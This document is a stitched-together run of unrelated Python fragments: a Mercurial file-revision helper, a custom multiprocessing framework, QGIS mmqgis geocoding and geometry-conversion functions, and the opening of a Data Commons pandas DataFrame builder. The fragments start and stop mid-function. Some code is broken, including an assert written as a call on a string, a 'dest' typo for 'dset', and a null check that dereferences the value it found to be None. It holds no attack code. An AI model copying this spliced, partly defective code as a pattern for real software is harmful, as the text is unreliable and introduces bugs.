child = lowestchild.get(fr)
if child is None:
# search for existence of this file revision in a head revision.
# There are three possibilities:
# - the revision exists in a head and we can find an
# introduction from there,
# - the revision does not exist in a head because it has been
# changed since its introduction: we would have found a child
# and be in the other 'else' clause,
# - all versions of the revision are hidden.
if lowesthead is None:
lowesthead = {}
for h in repo.heads():
fnode = repo[h].manifest().get(f)
if fnode is not None:
lowesthead[fl.rev(fnode)] = h
headrev = lowesthead.get(fr)
if headrev is None:
# content is nowhere unfiltered
continue
rev = repo[headrev][f].introrev()
else:
# the lowest known child is a good upper bound
childcrev = backrevref[child]
# XXX this does not guarantee returning the lowest
# introduction of this revision, but this gives a
# result which is a good start and will fit in most
# cases. We probably need to fix the multiple
# introductions case properly (report each
# introduction, even for identical file revisions)
# once and for all at some point anyway.
for p in repo[childcrev][f].parents():
if p.filerev() == fr:
rev = p.rev()
break
if rev == lkr: # no shadowed entry found
# XXX This should never happen unless some manifest points
# to biggish file revisions (like a revision that uses a
# parent that never appears in the manifest ancestors)
continue
# Fill the data for the next iteration.
for p in fl.parentrevs(fr):
if 0 <= p and p not in lowestchild:
lowestchild[p] = fr
backrevref[fr] = rev
s.add(rev)
return subset & | |
import sys
import os
import time
import queue
import random
import logging
import concurrent.futures as cf
from multiprocessing import Process
from multiprocessing import Queue
# PROGRAM CONFIG
STOPONFE = True;
DEBUG = False;
LOG = True;
# logger_format = "[%(asctime)s %(msecs)03dms] [PID %(process)d] %(message)s";
# error_logger_format = "[ERROR] [%(asctime)s] [PID %(process)d %(threadName)s] %(message)s";
info_logger_format = "[%(asctime)s %(msecs)03dms] [PID %(process)d %(threadName)s] %(message)s";
# logging.basicConfig(format=error_logger_format, level=logging.ERROR, datefmt="%I:%M:%S");
logging.basicConfig(format=info_logger_format, level=logging.INFO, datefmt="%I:%M:%S");
def info(message):
if (LOG is None and DEBUG) or LOG: logging.info(message);
return message;
class StopProcessing(Exception):
pass;
class Error(object):
## It's used to represent an error obtained, when an
## exception is raised.
def __init__(self, code=None, message: str=None, args: tuple=(None,)):
""" Constructor of an error"""
super(Error, self).__init__();
assert code is not None or message is not None or args == tuple((None,)) (
"This instance of Error is not valid."
);
self.__message = message;
self.__code = code;
self.__args = args;
@property
def message(self):
return self.__message;
@property
def code(self):
return self.__code;
@property
def args(self):
return self.__args;
def show(self):
if (LOG is None and DEBUG) or LOG: print(self);
return self;
def __str__(self):
msg = "[ERROR] ";
if self.__code is not None:
msg += "[CDOE {}] ".format(self.__code);
if self.__message is not None:
msg += "{}".format(self.__message);
else:
msg += "{}".format(self.__args);
return msg;
class Logger(object):
## 1. It's used to represent the errors log
## 2. It's a iterable object instance.
## 3. It has a len which equals to the errors count
def __init__(self,):
"""Contructor of a logger instance"""
super(Logger, self).__init__();
self.__errors = []; # this is the errors list
@property
def errors(self):
return self.__errors;
def err(self, e: Error):
"""Function which add an error in error instance list"""
self.__errors.append(e);
def has_errors(self):
"""Function to check if there is an error"""
return len(self.__errors) > 0;
def __iter__(self):
"""Define that the object is iterable."""
return iter(self.__errors);
def __len__(self):
"""Return the len of errors list."""
return len(self.__errors);
def __str__(self):
out = "";
for e in self.__errors:
out += "{}\n".format(e);
return out;
class CProcess(Process):
## It's used to represent a process with error managment.
def __init__(self, *args, **kwargs):
"""Constructor of a customized process"""
super(CProcess, self).__init__(*args, **kwargs);
self._log = Logger();
@property
def logger(self):
return self._log;
class State(object):
# Structure of global state for multi-processing
pass;
class BaseProc(object):
## This class is the basic structure of a Processing sequence and
## the elementary processing.
def __init__(self, name=None, stsdef=[0, 1]):
"""Constructor of a basic processing instance"""
super(BaseProc, self).__init__();
self.__status_index = 0; # represents the index of next status to select
self._local_data = None; # Local data
self._stsdef = stsdef # contains a definition of all available status
self._status = None; # Status of the processing
self._state = None; # State will be used in the processing (global data)
self._name = name if name is not None\
else str(random.randint(0, round(time.time())));
# Liste of errors detected when the course of the processing
self._log = Logger();
# callback methods used when processing start
# and when processing terminate
self._on_start_cb = None;
self._on_done_cb = None;
@property
def local(self):
return self._local_data;
@local.setter
def local(self, value):
self._local_data = value;
return value;
@property
def name(self):
return self._name;
@name.setter
def name(self, name):
self._name = name;
@property
def state(self):
return self._state;
@state.setter
def state(self, value):
self._state = value;
return value;
@property
def status(self):
return self._status;
@status.setter
def status(self, value):
if value in self._stsdef:
self.__status_index = self._stsdef.index(value) + 1;
self._status = value;
return self._status;
else:
e = Error(message="[ERROR] This status is not defined for this processing!").show();
self._log.err(e);
return False;
@property
def logger(self):
return self._log;
@property
def on_start_cb(self):
return self._on_start_cb;
@property
def on_done_cb(self):
return self._on_done_cb;
def mut(self):
"""Function that is used to change the processing status"""
if self.__status_index is not None and self.__status_index < len(self._stsdef):
self._status = self._stsdef[self.__status_index];
self.__status_index += 1;
else:
self._status = None;
self.__status_index = 0;
return self._status;
def set_on_start_cb(self, callback):
"""Function which defines the callback function which will be used
when the processing will start."""
assert callable(callback), (
"The callback must be a function which accepts 1 argument"
);
self._on_start_cb = callback;
return callback;
def set_on_done_cb(self, callback):
"""Function which defines the callback function which will be used
when the processing will terminate."""
assert callable(callback), (
"The callback must be a function which accepts 1 argument"
);
self._on_done_cb = callback;
return callback;
def _exec_f(self, state: object, data: object=None):
"""Function which will be called, when we execute this processing.
So this object which represent a processing is callable."""
# we can call the function of processing with the current state received
# by argument, provided the processing function is defined in this instance.
assert hasattr(self, 'proc_f'), (
"The proc_f function is not defined in this processing !"
);
assert callable(self.proc_f), (
"The proc_f must is a callable function."
);
# execute the processing function
result = None;
result = self.proc_f(state, data);
# we return the current state
return result;
def exec(self, state, args):
"""This function allows to recovery arguments from process queue and
to pass there to processing function for an execution of processing."""
# info("Execution of this processing started ...");
result = self._exec_f(state, args);
# info("Termited.");
return state, result;
def init_f(self, state: object):
"""Function to implement by programmer. This function is called before
execution of main processing."""
raise NotImplementedError;
class Proc(BaseProc):
## This class represent a elementary processing [O(1)]
def __init__(self, name=None, stsdef=[0]):
"""Constructor of an elementary processing instance."""
super(Proc, self).__init__(name, stsdef);
def proc_f(self, state: object, data: object=None):
"""Function which should be redefined by the programmer.
It's the function which implements the processing to course."""
raise NotImplementedError;
def __iter__(self):
"""Iterator of instruction of this processing"""
return iter([(self.exec, self._local_data,)]);
class MulProc(Proc):
## This class represent a multi-processing implementation [O(n)].
## This processing must be executed by a multi-thread loop using thread pool.
def __init__(self, name=None, stsdef=[0, 1]):
"""Constructor of a multi-processing instance."""
super(MulProc, self).__init__(name, stsdef);
# {_d_set} represent the var name which contains the iterable data.
# It must not be equal to None, because it's required.
self._d_set = [];
self._n_div = 0; # represents the number of division.
@property
def dset(self):
return self._d_set;
@dset.setter
def dset(self, dset):
"""Function that is used to define the dataset."""
self._d_set = dset;
return dset;
@property
def ndiv(self):
return self._n_div;
@ndiv.setter
def ndiv(self, ndv):
"""Function that is used to define the number of division"""
assert type(ndv) is int, ("The number of division must be an integer type.");
self._n_div = ndv;
return ndv;
def d_proc_f(self, state, dset, dx):
"""Function that is to implement for the thread processing of multi-processing process"""
raise NotImplementedError;
def dexc(self, state, args):
"""This function allows to recovery arguments from process queue and
to pass there to processing function for an execution of processing."""
dset = args.get('dset');
dx = args.get('dx');
# info(f"Exec d_proc {dx = } is started ...");
result = self._d_exc_f(state, dset, dx);
# info(f"d_proc {dx = } done !");
return state, result;
def _d_exc_f(self, state: object, dset: object, dx: list=[]):
"""Function which will be called, when we execute this processing.
So this object which represent a processing is callable."""
# we can call the function of processing with the current state received
# by argument, provided the processing function is defined in this instance.
assert hasattr(self, 'd_proc_f'), (
"The proc_f function is not defined in this processing !"
);
assert callable(self.d_proc_f), (
"The proc_f must is a callable function."
);
# the following var will contain the returned result
result = None;
# execute the processing function
dt = type(dset);
kx = [];
if dt is dict:
keys = dest.keys();
for k in dx:
kx.append(keys[k]);
elif dt is list or hasattr(dset, '__iter__'):
kx = dx;
if len(kx) > 0: info("ELEM PROC [%16d .. %16d] ..." % (kx[0], kx[-1]));
else:
info("NO PROC FOR [%16d .. %16d]" % (0, 0));
result = self.d_proc_f(state, dset, kx);
# err = Error(message=e.args[0], args=(e,));
# print("[ERROR] {}".format(err.message));
# self.__log.err(e);
# we return the current state
if len(kx) > 0: info("ELEM PROC [%16d .. %16d] ... DONE !" % (kx[0], kx[-1]));
return result;
def __iter__(self):
"""Function which returns a (dexc(), | |
(geometry.wkbType() == QGis.WKBMultiLineString) or \
(geometry.wkbType() == QGis.WKBMultiLineString25D):
lines = geometry.asMultiPolyline()
line = lines[0]
fromx = line[0].x()
fromy = line[0].y()
line = lines[len(lines) - 1]
tox = line[len(line) - 1].x()
toy = line[len(line) - 1].y()
else:
# errant geometry type?!
continue
# return "Street layer must be a lines or multilines (WKB Type " + \
# unicode(geometry.wkbType()) + ")"
# Use attribute values if specified
try:
if tox_attribute:
# (tox, test) = attributes[tox_attribute].toDouble()
tox = float(attributes[tox_attribute])
if toy_attribute:
# (toy, test) = attributes[toy_attribute].toDouble()
toy = float(attributes[toy_attribute])
if fromx_attribute:
# (fromx, test) = attributes[fromx_attribute].toDouble()
fromx = float(attributes[fromx_attribute])
if fromy_attribute:
# (fromy, test) = attributes[fromy_attribute].toDouble()
fromy = float(attributes[fromy_attribute])
except:
tox = 0
toy = 0
fromx = 0
fromy = 0
# Find percentage distance along street
left = ((leftfrom_number % 2) == (number % 2))
if left:
if (leftfrom_number == leftto_number):
ratio = 0.5
else:
ratio = float(number - leftfrom_number) \
/ float(leftto_number - leftfrom_number)
else:
if (rightfrom_number == rightto_number):
ratio = 0.5
else:
ratio = float(number - rightfrom_number) \
/ float(rightto_number - rightfrom_number)
# setback from corner
angle = atan2(toy - fromy, tox - fromx)
setback_fromx = fromx + (setback * cos(angle))
setback_tox = tox - (setback * cos(angle))
setback_fromy = fromy + (setback * sin(angle))
setback_toy = toy - (setback * sin(angle))
x = setback_fromx + ((setback_tox - setback_fromx) * ratio)
y = setback_fromy + ((setback_toy - setback_fromy) * ratio)
# setback from street center
if left:
y += (setback * cos(angle))
x -= (setback * sin(angle))
else:
y -= (setback * cos(angle))
x += (setback * sin(angle))
# Create the output feature
newattributes = []
for field in row:
# newattributes.append(QVariant(field))
newattributes.append(field)
#newattributes.append(QVariant(x))
#newattributes.append(QVariant(y))
newattributes.append(x)
newattributes.append(y)
newfeature = QgsFeature()
newfeature.setAttributes(newattributes)
geometry = QgsGeometry.fromPoint(QgsPoint(x, y))
newfeature.setGeometry(geometry)
outfile.addFeature(newfeature)
matched_count += 1
# Remove address so not searched further
del addresses[row_index]
else:
row_index = row_index + 1
#print "del outfile 1"
del outfile
# Write unjoined addresses to notfound file
for index, row in enumerate(addresses):
if row[streetnamefield_index] > "":
notfoundwriter.writerow([unicode(field).encode("utf-8") for field in row])
# Close notfound file
del notfound
if matched_count and addlayer:
#print "addLayer"
vlayer = qgis.addVectorLayer(shapefilename, os.path.basename(shapefilename), "ogr")
mmqgis_completion_message(qgis, unicode(matched_count) + " of " + unicode(len(addresses)) \
+ " addresses geocoded from " + unicode(feature_count) + " street records")
return None
# --------------------------------------------------------
# mmqgis_geometry_convert - Convert geometries to
# simpler types
# --------------------------------------------------------
def mmqgis_geometry_convert(qgis, layername, newgeometry, savename, addlayer):
layer = mmqgis_find_layer(layername)
if (layer == None) and (layer.type() != QgsMapLayer.VectorLayer):
return "Vector layer required: " + layername
# Create output file
if len(savename) <= 0:
return "Invalid output filename given"
if QFile(savename).exists():
if not QgsVectorFileWriter.deleteShapeFile(savename):
return "Failure deleting existing shapefile: " + savename
if (newgeometry == "Points") or (newgeometry == "Centroids") or \
(newgeometry == "Nodes") or (newgeometry == "Line Centers"):
savetype = QGis.WKBPoint
elif (newgeometry == "Lines"):
savetype = QGis.WKBLineString
elif (newgeometry == "Polygons"):
savetype = QGis.WKBPolygon
elif (newgeometry == "Multipoints"):
savetype = QGis.WKBMultiPoint
elif (newgeometry == "Multilines"):
savetype = QGis.WKBMultiLineString
elif (newgeometry == "Multipolygons"):
savetype = QGis.WKBMultiPolygon
else:
return "Invalid type for new geometry: " + unicode(newgeometry)
outfile = QgsVectorFileWriter(savename, "utf-8", layer.fields(), savetype, layer.crs())
if (outfile.hasError() != QgsVectorFileWriter.NoError):
return "Failure creating output shapefile: " + unicode(outfile.errorMessage())
# Iterate through each feature in the source layer
feature_count = layer.featureCount()
out_count = 0
for feature_index, feature in enumerate(layer.getFeatures()):
# shapeid = unicode(feature.id()).strip()
if (feature_index % 10) == 0:
mmqgis_status_message(qgis, "Converting feature " + str(feature_index) \
+ " of " + unicode(feature_count))
if (feature.geometry().wkbType() == QGis.WKBPoint) or \
(feature.geometry().wkbType() == QGis.WKBPoint25D):
if (newgeometry == "Points"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(feature.geometry().asPoint()))
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + unicode(newgeometry)
elif (feature.geometry().wkbType() == QGis.WKBLineString) or \
(feature.geometry().wkbType() == QGis.WKBLineString25D):
if (newgeometry == "Nodes"):
polyline = feature.geometry().asPolyline()
for point in polyline:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Line Centers"):
point = mmqgis_line_center(feature.geometry(), 50.0)
if (not point):
continue
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(point)
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Lines"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Multilines"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromMultiPolyline([feature.geometry().asPolyline()]))
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
elif (feature.geometry().wkbType() == QGis.WKBPolygon) or \
(feature.geometry().wkbType() == QGis.WKBPolygon25D):
if (newgeometry == "Nodes"):
polygon = feature.geometry().asPolygon()
for polyline in polygon:
for point in polyline:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Lines"):
polygon = feature.geometry().asPolygon()
for polyline in polygon:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPolyline(polyline))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Multilines"):
linestrings = []
polygon = feature.geometry().asPolygon()
for polyline in polygon:
linestrings.append(polyline)
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromMultiPolyline(linestrings))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Polygons"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry())
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
elif (feature.geometry().wkbType() == QGis.WKBMultiPoint) or \
(feature.geometry().wkbType() == QGis.WKBMultiPoint25D):
if (newgeometry == "Points"):
points = feature.geometry().asMultiPoint()
for point in points:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
elif (feature.geometry().wkbType() == QGis.WKBMultiLineString) or \
(feature.geometry().wkbType() == QGis.WKBMultiLineString25D):
if (newgeometry == "Nodes"):
polylines = feature.geometry().asMultiPolyline()
for polyline in polylines:
for point in polyline:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Lines"):
linestrings = feature.geometry().asMultiPolyline()
for linestring in linestrings:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPolyline(linestring))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Line Centers"):
linestrings = feature.geometry().asMultiPolyline()
for linestring in linestrings:
line_center = mmqgis_line_center(QgsGeometry.fromPolyline(linestring), 50.0)
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(line_center)
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Multilines"):
linestrings = feature.geometry().asMultiPolyline()
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromMultiPolyline(linestrings))
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
elif (feature.geometry().wkbType() == QGis.WKBMultiPolygon) or \
(feature.geometry().wkbType() == QGis.WKBMultiPolygon25D):
if (newgeometry == "Nodes"):
polygons = feature.geometry().asMultiPolygon()
for polygon in polygons:
for polyline in polygon:
for point in polyline:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPoint(point))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Centroids"):
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(feature.geometry().centroid())
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Lines"):
polygons = feature.geometry().asMultiPolygon()
for polygon in polygons:
for polyline in polygon:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPolyline(polyline))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Polygons"):
polygons = feature.geometry().asMultiPolygon()
for polygon in polygons:
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromPolygon(polygon))
outfile.addFeature(newfeature)
out_count = out_count + 1
elif (newgeometry == "Multilines") or (newgeometry == "Multipolygons"):
polygons = feature.geometry().asMultiPolygon()
newfeature = QgsFeature()
newfeature.setAttributes(feature.attributes())
newfeature.setGeometry(QgsGeometry.fromMultiPolygon(polygons))
outfile.addFeature(newfeature)
out_count = out_count + 1
else:
return "Invalid Conversion: " + mmqgis_wkbtype_to_text(feature.geometry().wkbType()) + \
" to " + newgeometry
del outfile
if addlayer:
qgis.addVectorLayer(savename, os.path.basename(savename), "ogr")
mmqgis_completion_message(qgis, unicode(feature_count) + " features converted to " + unicode(out_count) + " features")
return None
# --------------------------------------------------------
# mmqgis_geometry_to_multipart - Convert singlepart
# to multipart geometries
# --------------------------------------------------------
def mmqgis_geometry_to_multipart(qgis, layername, mergefield, mergeattop, savename, addlayer):
# Error checking
layer = mmqgis_find_layer(layername)
if (layer == None) and (layer.type() != QgsMapLayer.VectorLayer):
return "Invalid Vector Layer " + layername
if (layer.wkbType() in [QGis.WKBPoint, QGis.WKBPoint25D]):
newtype = QGis.WKBMultiPoint
elif (layer.wkbType() in [QGis.WKBLineString, QGis.WKBLineString25D]):
newtype = QGis.WKBMultiLineString
elif (layer.wkbType() in [QGis.WKBPolygon, QGis.WKBPolygon25D]):
newtype = QGis.WKBMultiPolygon
else:
return "Geometry is already multipart: " + mmqgis_wkbtype_to_text(layer.wkbType())
merge_index = layer.fieldNameIndex(mergefield)
if merge_index < 0:
return "Invalid merge field: " + mergefield
# Create output file
if len(savename) <= 0:
return "Invalid output filename given"
if QFile(savename).exists():
if not QgsVectorFileWriter.deleteShapeFile(savename):
return "Failure deleting existing shapefile: " + savename
outfile = QgsVectorFileWriter(savename, "utf-8", layer.fields(), newtype, layer.crs())
if (outfile.hasError() != QgsVectorFileWriter.NoError):
return "Failure creating output shapefile: " + unicode(outfile.errorMessage())
# Have to read features into memory because nested loops of getFeature() don't work
feature_count = layer.featureCount()
features = []
for index, feature in enumerate(layer.getFeatures()):
if (index % 10) == 0:
mmqgis_status_message(qgis, "Reading feature " + unicode(index) \
+ " of " + unicode(feature_count))
features.append(feature)
# Iterate through each feature in the source layer
merge_count = 0
for x in range(0, len(features)):
if (x % 10) == 0:
mmqgis_status_message(qgis, "Converting feature " + str(x) \
+ " of " + unicode(len(features)))
if features[x] != None:
attributes = features[x].attributes()
# key = unicode(attributes[merge_index].toString()).lower()
key = unicode(attributes[merge_index]).lower()
# print "Processing " + unicode(x) + ": " + key
newgeometry = []
if newtype == QGis.WKBMultiPoint:
if (feature.geometry().wkbType() == QGis.WKBPoint) or \
(feature.geometry().wkbType() == QGis.WKBPoint25D):
newgeometry.append(features[x].geometry().asPoint())
elif (feature.geometry().wkbType() == QGis.WKBMultiPoint) or \
(feature.geometry().wkbType() == QGis.WKBMultiPoint25D):
for point in features[x].geometry().asMultiPoint():
newgeometry.append(point)
else:
return "Invalid multipoint geometry type: " + \
mmqgis_wkbtype_to_text(features[x].geometry().wkbType())
elif newtype == QGis.WKBMultiLineString:
# This is a workaround since shapefiles do not distinguish
# between polylines and multipolylines - all polygons can have multiple
# parts. QgsGeometry.wkbType() returns WKBLineString even if the
# geometry is WKBMultiLineString
#if (feature.geometry().wkbType() == QGis.WKBLineString) or \
# (feature.geometry().wkbType() == QGis.WKBLineString25D):
if len(features[x].geometry().asPolyline()) > 0:
newgeometry.append(features[x].geometry().asPolyline())
#elif (feature.geometry().wkbType() == QGis.WKBMultiLineString) or \
# (feature.geometry().wkbType() == QGis.WKBMultiLineString25D):
elif len(features[x].geometry().asMultiPolyline()) > 0:
for polyline in features[x].geometry().asMultiPolyline():
newgeometry.append(polyline)
else:
return "Invalid multilinestring geometry type: " + \
mmqgis_wkbtype_to_text(features[x].geometry().wkbType())
else: # newtype == QGis.WKBMultiPolygon:
# This is a workaround since shapefiles do not distinguish
# between polygons and multipolygons - all polygons can have multiple
# parts. QgsGeometry.wkbType() returns WKBPolygon even if the
# geometry is WKBMultiPolygon
#if (feature.geometry().wkbType() == QGis.WKBPolygon) or \
# (feature.geometry().wkbType() == QGis.WKBPolygon25D):
if len(features[x].geometry().asPolygon()) > 0:
newgeometry.append(features[x].geometry().asPolygon())
#elif (feature.geometry().wkbType() == QGis.WKBMultiPolygon) or \
# (feature.geometry().wkbType() == QGis.WKBMultiPolygon25D):
elif len(features[x].geometry().asMultiPolygon()) > 0:
for polygon in features[x].geometry().asMultiPolygon():
newgeometry.append(polygon)
else:
return "Invalid multipolygon geometry type: " + \
mmqgis_wkbtype_to_text(features[x].geometry().wkbType())
for y in range(x + 1, len(features)):
#print " Comparing " + unicode(y)
#if (features[y] != None) and \
# (unicode(features[y].attributes()[merge_index].toString()).lower() == key):
if (features[y] != None) and \
(unicode(features[y].attributes()[merge_index]).lower() == key):
# print " " + unicode(features[y].geometry().wkbType())
if newtype == QGis.WKBMultiPoint:
newgeometry.append(features[y].geometry().asPoint())
elif newtype == QGis.WKBMultiLineString:
newgeometry.append(features[y].geometry().asPolyline())
# MultiPolygons must be broken apart into separate polygons
elif features[y].geometry().wkbType() == QGis.WKBMultiPolygon:
for polygon in features[y].geometry().asMultiPolygon():
newgeometry.append(polygon)
else: # QGis.WKBMultiPolygon:
newgeometry.append(features[y].geometry().asPolygon())
if mergeattop == "Sum":
for zindex, zfield in enumerate(layer.fields()):
zvalue = features[y].attributes()[zindex]
if (zfield.type() == | |
<filename>datacommons_pandas/df_builder.py
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data Commons Pandas API DataFrame Builder Module.
Provides functions for building pandas DataFrames using the Data Commons Graph.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import pandas as pd
import six
import datacommons_pandas.stat_vars as dc
def build_time_series(place,
stat_var,
measurement_method=None,
observation_period=None,
unit=None,
scaling_factor=None):
"""Constructs a pandas Series with `dates` as the index and corresponding `stat_var` statistics as values.
Args:
place (`str`): The dcid of Place to query for.
stat_var (`str`): The dcid of the StatisticalVariable.
measurement_method (`str`): Optional, the dcid of the preferred
`measurementMethod` value.
observation_period (`str`): Optional, the preferred
`observationPeriod` value.
unit (`str`): Optional, the dcid of the preferred `unit` value.
scaling_factor (`int`): Optional, the preferred `scalingFactor` value.
Returns:
A pandas Series with Place IDs as the index and observed statistics as
values, representing a time series satisfying all optional args.
"""
return pd.Series(
dc.get_stat_series(place, stat_var, measurement_method,
observation_period, unit, scaling_factor))
def _group_stat_all_by_obs_options(places, stat_vars, keep_series=True):
"""Groups the result of `get_stat_all` by StatVarObservation options for time series or multivariates.
Note that this function does not preserve `(place, stat_var)` pairs that
yield no data `from get_stat_all`. In the extreme case that there is no
data for any pairs, raise a ValueError instead of returning an empty dict.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_vars (`Iterable` of `str`): The dcids of the StatisticalVariables.
keep_series (`boolean`): if True, output time series grouped by
StatVarObservation options; if False, output latest statistics grouped
by StatVarObservation options.
Returns:
A nested dict mapping each StatisticalVariable in `stat_vars` to its
StatVarObservation options. In turn, each StatVarObservation option
maps to a list of rows, one per place, with the place id and stat data.
Raises:
ValueError: If the payload returned by the Data Commons REST API is
malformed, or if there is no data for any (Place, StatisticalVariables)
pair.
"""
if keep_series:
if len(stat_vars) != 1:
raise ValueError(
'When `keep_series` is set, only one StatisticalVariable for `stat_vars` is allowed.'
)
res = collections.defaultdict(list)
else:
res = collections.defaultdict(lambda: collections.defaultdict(list))
stat_all = dc.get_stat_all(places, stat_vars)
for place, place_data in stat_all.items():
if not place_data:
continue
for stat_var, stat_var_data in place_data.items():
if not stat_var_data:
continue
for source_series in stat_var_data['sourceSeries']:
series = source_series['val']
# Convert dict of SVO options into nested tuple (hashable key).
obs_options = (('measurementMethod',
source_series.get('measurementMethod')),
('observationPeriod',
source_series.get('observationPeriod')),
('unit', source_series.get('unit')),
('scalingFactor',
source_series.get('scalingFactor')))
if keep_series:
res[obs_options].append(dict({'place': place}, **series))
else:
date = max(series)
res[stat_var][obs_options].append({
'place': place,
'date': date,
'val': series[date]
})
if not res:
raise ValueError(
'No data for any of specified Places and StatisticalVariables.')
if keep_series:
return dict(res)
else:
return {k: dict(v) for k, v in res.items()}
def _time_series_pd_input(places, stat_var):
"""Returns a `list` of `dict` per element of `places` based on the `stat_var`.
Data Commons will pick a set of StatVarObservation options that covers the
maximum number of queried places. Among ties, Data Commons selects an option
set with the latest Observation.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_var (`str`): The dcid of the StatisticalVariable.
Returns:
A `list` of `dict`, one per element of `places`. Each `dict` consists of
the time series and place identifier.
Examples:
>>> _time_series_pd_input(["geoId/29", "geoId/33"], "Count_Person")
[
{'2020-03-07': 20, '2020-03-08': 40, 'place': 'geoId/29'},
{'2020-08-21': 428, '2020-08-22': 429, 'place': 'geoId/33'}
]
"""
rows_dict = _group_stat_all_by_obs_options(places, [stat_var],
keep_series=True)
most_geos = []
max_geo_count_so_far = 0
latest_date = []
latest_date_so_far = ''
for options, rows in rows_dict.items():
current_geos = len(rows)
if current_geos > max_geo_count_so_far:
max_geo_count_so_far = current_geos
most_geos = [options]
# Reset tiebreaker stats. Recompute after this if-else block.
latest_date = []
latest_date_so_far = ''
elif current_geos == max_geo_count_so_far:
most_geos.append(options)
else:
# Do not compute tiebreaker stats if no change to most_geos.
# Skip to top of the for loop.
continue
for row in rows:
dates = set(row.keys())
dates.remove('place')
row_max_date = max(dates)
if row_max_date > latest_date_so_far:
latest_date_so_far = row_max_date
latest_date = [options]
elif row_max_date == latest_date_so_far:
latest_date.append(options)
for options in most_geos:
if options in latest_date:
return rows_dict[options]
def build_time_series_dataframe(places, stat_var, desc_col=False):
"""Constructs a pandas DataFrame with `places` as the index and dates of the time series as the columns.
To ensure statistics are comparable across all Places, when multiple
StatVarObservations options are available for Place and StatVar combos,
Data Commons selects the StatVarObservation options that covers the most
Places, and breaks ties using the StatVarObservation options that yield
the latest Observation for any Place.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_var (`str`): The dcid of the StatisticalVariable.
desc_col: Whether to order columns in descending order.
Returns:
